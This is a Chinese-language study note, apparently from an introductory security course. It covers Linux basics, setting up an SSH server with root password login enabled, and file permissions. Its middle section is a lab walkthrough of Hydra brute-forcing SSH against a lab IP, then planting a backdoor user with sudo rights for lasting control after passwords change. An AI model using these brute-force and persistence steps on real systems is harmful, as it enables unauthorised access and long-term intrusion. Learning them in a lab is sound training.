一、初识Linux系统

1.Linux起源（没啥用）

林纳斯·本纳第克特·托瓦兹——linux之父概况著名的电脑程序员、黑客。Linux内核的发明人及该计划的合作者。托瓦兹利用个人时间及器材创造出了这套当今全球最流行的操作系统（作业系统）内核之一。

2.Linux发行版

Linux 发行版是将 Linux 内核、开源软件（如 Shell、编译器、桌面环境、应用程序）及系统工具整合打包，并提供安装、更新、维护机制的完整可直接使用的操作系统套件。

3.服务器

和个人电脑相比，作为服务器需要7×24 小时不间断稳定运行、支撑多用户高并发访问，同时要具备强安全性、灵活可扩展性和低运维成本。

4.虚拟机安装与目录结构

实操说明：通过虚拟机体验 Ubuntu（桌面版）和 Kali（网安专用），所有 Linux 发行版操作逻辑一致

核心差异：Linux 无 C 盘、D 盘等盘符，与 Windows 目录结构完全不同

 Windows 创建文件：CMD 中执行`cd D: && type nul > a.txt`

 Linux 创建文件：需通过命令行操作，无盘符概念

二、Linux系统服务安全

1. SSH 协议基础

- 定义：类似 Windows RDP 的远程操作协议，支持跨地域远程控制 Linux 服务器

- 应用场景：无需现场操作机房或云服务器，通过网络即可完成管理

       SSH 类似 Windows 的 RDP，以命令行为主（RDP 以图形化桌面为主），实现 “远程如同本地操作” 的效果。

2. 环配置实操

（1）包管理器使用

- 作用：Linux 安装软件的核心工具（类似手机应用商城）

- 主流类型：

- RedHat/CentOS：`yum`

- Ubuntu/Kali：`apt`

- 关键操作：修改镜像源（国内推荐阿里云镜像：https://developer.aliyun.com/mirror/），解决海外源下载慢问题

（2）SSH 安装与配置步骤

1. Ubuntu系统切换root用户（输入密码root1234%）

sudo su

#安装前检查ssh不存在

root@ubuntu:/home/enjoy# service ssh status

Unit ssh.service could not be found.

2. 安装SSH服务（需root权限+联网）

apt install openssh-server

#安装后可以通过

service ssh status

来进行检查

3. 修改配置文件

nano /etc/ssh/sshd_config

#nano中

ctrl+w唤起搜索框

输入要搜索的内容后，按 `Enter` 键开始搜索。

按下 `Alt + W`就是下一个

4. 关键配置项（删除#注释并修改）

PermitRootLogin yes  # 允许root用户远程登录

PasswordAuthentication yes  # 允许密码认证

按ctrl+x退出--->按Y回车

#修改后可以检查

cat /etc/ssh/sshd_config | grep "PermitRootLogin"

cat /etc/ssh/sshd_config | grep "PasswordAuthentication"

5. 重启SSH服务

service ssh restart

#用xshell来连接

3.Hydra SSH弱口令暴破实战

Hydra是一个开源的密码破解工具，主要用于网络安全的渗透测试。它可以对登录页面进行暴力破解攻击，支持多种协议，包括HTTP、HTTPS、FTP、SSH、Telnet等。

（1）漏洞排查

操作逻辑：先查询 SSH 版本，判断是否存在历史漏洞，若版本高于漏洞影响范围则转向暴力破解

（2）暴力破解（Hydra 工具）-  kali linux系统自带

- 原理：通过批量尝试密码组合猜测系统密码的攻击方式

- 核心工具：Hydra（自动读取密码本，批量尝试登录）

- hydra -l 【用户名，如root】 -P 【密码字典路径】 【ssh://目标机IP】

hydra -l root -P password.txt ssh://192.168.79.132

前提条件：需准备密码本（包含大量可能的密码组合）

ssh远程连接

（3）后门用户植入

- 攻击逻辑：避免密码被修改后失去控制权，在目标系统植入后门用户

- 核心目的：实现长期控制，应对目标用户定期修改密码的情况

- 新建用户：useradd -m 【用户名】

- 设置密码：passwd 【用户名】

- 临时以root权限执行指令：

sudo 【具体命令】

配置sudo权限：

nano /etc/sudoers 增加：

【用户名】 ALL=(ALL:ALL) ALL

- 设置用户root权限：

nano /etc/passwd

(4)用户和组管理

用户（user）

每个使用Linux系统的个体或进程都需要一个用户账户，系统资源访问的最小权限单元

root用户：UID=0，拥有最高权限

系统用户：UID 1-999（通常用于服务进程）

普通用户：UID ≥1000（手动创建的用户）

组（group）

批量管理用户权限的集合

主组（Primary Group）：用户创建文件时默认归属组

附加组（Supplementary Group）：用户可加入的额外权限组

命令追加sudo附加组：

usermod -aG sudo 【用户名】

(5)文件权限管理

ls：列出当前目录下文件

ll/ls -l：列出当前目录下文件（详细）

第 1 列：文件类型 + 权限标识（共 10 个字符）

第 3 列：文件 / 目录的所有者

第 4 列：文件 / 目录的所属用户组

更改文件所有者

chown 用户:用户组 test

修改文件权限

chmod 755 文件名  

chmod u=rwx,g=rx,o=rx 文件名

chmod +x 文件名

chmod u+x 文件名

chmod g-x 文件名